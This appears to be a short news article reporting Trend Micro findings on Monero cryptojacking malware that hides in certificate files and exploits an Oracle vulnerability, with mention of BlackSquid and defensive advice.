Reports by cybersecurity firm, Trend Micro, has indicated that the introduced malware harnesses a vulnerability to issue a command for the execution of various routines. According to the researchers, the code avoids discovery by violating certificate files.
By hiding between certificate files, it avoids detection by antivirus systems and firewalls. The malware uses PowerShell script to issue a command for the download of a certificate file from which it uses a decoding tool such as CertUtil to reveal another command.
This command downloads several automated scripts amongst which is the payload for the Monero miner and Update.ps1. The malware then deletes the certificate file after which it downloads an automated script for execution. This automated script is then executed as the crypto miner and works so that upon every update, Monero is mined.
A rise in Crypto Mining Attacks
It would appear that crypto jackers are increasingly on prowl as an increased number in attack campaigns have been witnessed in the last couple of months. April 2019 opened to waves of crypto mining attacks executed by exploiting the power of EternalBlue and PowerShell.
According Trend Micro, the process of using obfuscation techniques is not a new one. True to form, BlackSquid, a new malware capable of exploiting eight different vulnerabilities on servers- was discovered have installed the XM-Rig Monero mining bot by circumventing flags at hardware breakpoints.
Reports indicate that this new family of malware is highly capable of “brute-force attacks, anti-bugging, and anti-virtualisation” to avoid detection and gain total access over the system. Researchers believe that this malware is one of the biggest crypto mining malware to be encountered.
Security experts advise that this mining malware can be better combated with the use of threat feeds integrated with security information and event management tool. According to their inferences, this tool will help servers look through traffic to note any malware lurking behind files.
To this effect, the affected company, Oracle released an update that should combat the ‘malware’s attack vector’. Though no particular mining episode has been noted by the hackers since the introduction of the malware, it is expected that the update will keep the attacks at bay.